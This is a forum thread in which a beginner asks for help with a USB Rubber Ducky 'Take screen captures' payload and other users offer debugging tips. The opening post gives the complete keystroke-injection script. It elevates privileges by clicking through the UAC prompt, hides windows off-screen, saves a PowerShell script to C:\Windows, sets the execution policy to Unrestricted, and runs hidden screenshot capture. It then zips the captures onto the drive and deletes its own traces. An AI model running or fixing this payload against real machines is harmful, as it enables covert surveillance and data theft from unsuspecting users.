Jump to content

"Take screen captures" Payload not work


trib
 Share

Recommended Posts

Hello every one,

I am newbie and not a IT expert. I just know basically about coding. I had my USB for 3 months but i have just successfully flash it using window just 2 days ago since it's quite complicated to me. Currently my USB Ducky using twin duck 2.1 firm ware and it was tested on window 10 OS. It can execute simple "Hello World" Payload. But it can't execute "Take screen captures" payload.

I encode using Online Encoder Website ( http://ducktoolkit-411.rhcloud.com/Home.jsp).Reporting method was copying to my USB driver. DUCKY is the name that i filled in next step. (Do i need to format it in lowercase as suggestion ?)

Here is the script

DELAY 1050

GUI r
DELAY 1050
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 1050
ALT y
DELAY 1050
ENTER
ALT SPACE
DELAY 1050
STRING m
DELAY 1050
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory
ENTER
STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth
ENTER
STRING $displayWidth = $displayInfo.ScreenWidth
ENTER
STRING $displayHeight = $displayInfo.ScreenHeight
ENTER
STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing")
ENTER
STRING $x = 0
ENTER
STRING do { Start-Sleep -Seconds 60
ENTER
STRING $jpegName = (get-date).ToString('HHmmss')
ENTER
STRING $image = new-object System.Drawing.Bitmap 1366 ,768
ENTER
STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight
ENTER
STRING $screen = [system.Drawing.Graphics]::FromImage($image)
ENTER
STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy))
ENTER
STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg));
ENTER
STRING $x++ } while ($x -ne 2);
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $usbPresent = 'False'
ENTER
STRING do {
ENTER
STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | Measure
ENTER
STRING if ($present.Count -ge 1){
ENTER
STRING $usbPresent = 'True' }Else {
ENTER
STRING $usbPresent = 'False'}}
ENTER
STRING until ($usbPresent -eq 'True')
ENTER
STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select Name
ENTER
STRING move-item c:\Windows\Report.zip $driveLetter.Name
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL S
DELAY 1050
STRING C:\Windows\config-156e3.ps1
ENTER
DELAY 1050
ALT F4
DELAY 1050
GUI r
DELAY 1050
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1050
ALT y
DELAY 1050
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 1050
STRING m
DELAY 1050
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1050
STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1
ENTER

I increase the delay time as well as execute the script by myself to debug. I found something that i think it may be the issues.

- I found that The "ALT y"command on the 7th line c not make any change when i executed it. Neither the one on 172nd line command. Not mention that i was combined to the command "TRING mode con:cols=14 lines=1" and turn into "ymode" then the error was "ymode is not recognized as the internal of external command, operable program or batch file". So i erase it.

-After erasing "ALT y" command make error. The USB executed that script with this warning "the screen can not set to the number of lines and columns specified".

I think i'm currently stuck here. I don't understand what this command means. Can anyone help me solve this solution?

Link to comment
Share on other sites

ALT Y command is used when a modal dialog appears and you want to select a button with a shortcut with the letter Y. In this case, the script is trying to select the "Yes" option. That order only works on Windows with english as primary language (for example, in spanish the combination is "ALT S").

To avoid language dependence, I recommend you to use "LEFTARROW+ENTER", assuming any admin order has the option "No" pre selected, on a scheme where the order is "YES - NO"

Before going on, I suggest you to understand the script, trying to reproduce line by line. There is no sense in send a payload that you don't understand (i.e., if you have a disk partition, why you need to create a file when simply you can execute from the ducky drive?)

Link to comment
Share on other sites

ALT Y command is used when a modal dialog appears and you want to select a button with a shortcut with the letter Y. In this case, the script is trying to select the "Yes" option. That order only works on Windows with english as primary language (for example, in spanish the combination is "ALT S").

To avoid language dependence, I recommend you to use "LEFTARROW+ENTER", assuming any admin order has the option "No" pre selected, on a scheme where the order is "YES - NO"

Before going on, I suggest you to understand the script, trying to reproduce line by line. There is no sense in send a payload that you don't understand (i.e., if you have a disk partition, why you need to create a file when simply you can execute from the ducky drive?)

Thank you for your reply

I do understand the script since i read the ducky script carefully. I also executed every line in the script by myself, not by the USB. I found that, every step was executed smoothly, it just stuck for the command STRING mode con:cols=14 lines=1 after saving the notepad file (config-156e3.ps1) into C:\ . I understand the ducky script, but i admit that i'm not get so familiar with CMD command. All i know about those CMD command is create a notepad file > save to C:\ > then executed it by CMD. I will try to learn command CMD later. Now i just trying to understand what error here. And i think it's because of wrong ducky script

Link to comment
Share on other sites

I've been tested those commands on a Win7: opening a admin command prompt with powershell, resizing (the mod string), selecting "move" and moving down with down arrow key, and works like a charm.

Maybe the prior commands are the trouble in the full sequence. Are you sure the sequence is executed correctly? It means, is really saving (Control+S), typing the filename (C:\...) and closing the file (ALT+F4) before opening the command prompt? For example, if the save dialog is not showing at time (1.05 secs in your case), the rest of the commands are pointless.

Anyway, if you "move down" the cmd window, is not necessary the resize function ;)

Link to comment
Share on other sites

I've been tested those commands on a Win7: opening a admin command prompt with powershell, resizing (the mod string), selecting "move" and moving down with down arrow key, and works like a charm.
Maybe the prior commands are the trouble in the full sequence. Are you sure the sequence is executed correctly? It means, is really saving (Control+S), typing the filename (C:\...) and closing the file (ALT+F4) before opening the command prompt? For example, if the save dialog is not showing at time (1.05 secs in your case), the rest of the commands are pointless.
Anyway, if you "move down" the cmd window, is not necessary the resize function ;)

Yes, it did save a notepad file name config-xxx into C:\Window.Everything seems to be ok until the script executed the command "mode con:cols=14 lines=1". So i guess the problem must be in prior commands as you said. So what should i do now? :(

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...